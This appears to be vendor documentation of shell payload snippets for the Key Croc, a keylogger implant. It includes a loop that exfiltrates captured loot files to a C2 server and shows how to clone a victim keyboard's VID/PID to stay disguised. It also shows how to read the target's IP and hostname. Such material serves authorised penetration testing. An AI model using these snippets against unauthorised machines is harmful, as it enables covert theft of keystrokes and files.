Key Croc
Search…
Helpful Payload Snippets

The C2EXFIL tool, used to exfiltrate files to the configured Cloud C2 server, normally only handles one file at a time. Using a for loop, one may iterate over multiple files in a directory.
FILES="$LOOT_DIR/*.txt"
for f in $FILES; do C2EXFIL STRING $f Example; done

By default the Key Croc boots into Attack Mode and clones the VID and PID values of the connected human interface device (HID Keyboard).
The VID and PID values are stored in the /tmp/vidpid directory and may be referenced in a payload using the following:
# Set ATTACKMODE to HID and Ethernet with cloned keyboard VID/PID
VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
ATTACKMODE HID ECM_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT

If the Key Croc is in the Attack Mode, rather than Arming Mode, the /tmp/attackmode file will exist.
Checking the current ATTACKMODE
The Key Croc stores its current ATTACKMODE in the file /tmp/mode. In addition to the ATTACKMODE options like HID or SERIAL, the /tmp/mode file reports all additional parameters such as VID and PID. These values may be passed to a new ATTACKMODE command using the bash command substitution feature. In this example, the output of "cat /tmp/mode", inside of the $() directive, is substituted.
[email protected]:~# cat /tmp/mode
HID VID_0X04B3 PID_0X3025
[email protected]:~# ATTACKMODE ECM_ETHERNET $(cat /tmp/mode)
TARGET_IP = 172.16.64.10, TARGET_HOSTNAME = kali, HOST_IP = 172.16.64.1

While the ECM_ETHERNET and RNDIS_ETHERNET options for ATTACKMODE will display the Target IP address and hostname interactively, these values may also be used in a payload. To store these values in a variable, use the following:
GET_VARS
# This exports the following variables:
$TARGET_IP
$TARGET_HOSTNAME
$HOST_IP
Alternatively, these target values may be obtained from the following:
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
And the host IP (the IP address of the Key Croc itself) can be determined with the following:
HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
However, unless changed from its default this value will be 172.16.64.1.

From firmware 1.3+, many functions of the Key Croc may be exposed by sourcing the croc_framework. The GET_HELPERS command provides an outline of their functions:
[email protected]:~/loot# GET_HELPERS
Available helper functions provided by sourcing croc_framework
MOUNT_UDISK
Mounts udisk and handles syncing /root/loot/ and /root/udisk/loot
UNMOUNT_UDISK
Safely Unmounts udisk
UPDATE_LANGUAGES
Copy language files from udisk to the croc
ENABLE_INTERFACE
Enables wlan0
CLEAR_WIFI_CONFIG
Remove wpa_supplicant.conf to clear current wireless configuration
CONFIG_OPEN_WIFI
Generate a wpa_supplicant.conf for open wifi
Example: CONFIG_OPEN_WIFI 'attwifi'
CONFIG_PSK_WIFI
Generate a wpa_supplicant.conf for psk wifi
Example: CONFIG_PSK_WIFI 'attwifi' 'password'
START_WLAN_DHCP
Start dhcp on wlan0
ENABLE_WIFI
Enable wifi helper
configures wpa_supplicant, indicates using LED,
enables interface, starts wpa_supplicant and dhcp
Example psk: ENABLE_WIFI 'attwifi' 'password'
Example open: ENABLE_WIFI 'attwifi'
DISABLE_SSH
Disable SSH service
ENABLE_SSH
Enable SSH service
Copy link
On this page
EXFILTRATE MULTIPLE FILES USING C2EXFIL
ADD AN ATTACKMODE WITH THE CLONED VID AND PID VALUES
CHECKING CURRENT MODE (ATTACK OR ARMING)
GETTING THE TARGET HOSTNAME AND IP ADDRESS
FRAMEWORK HELPERS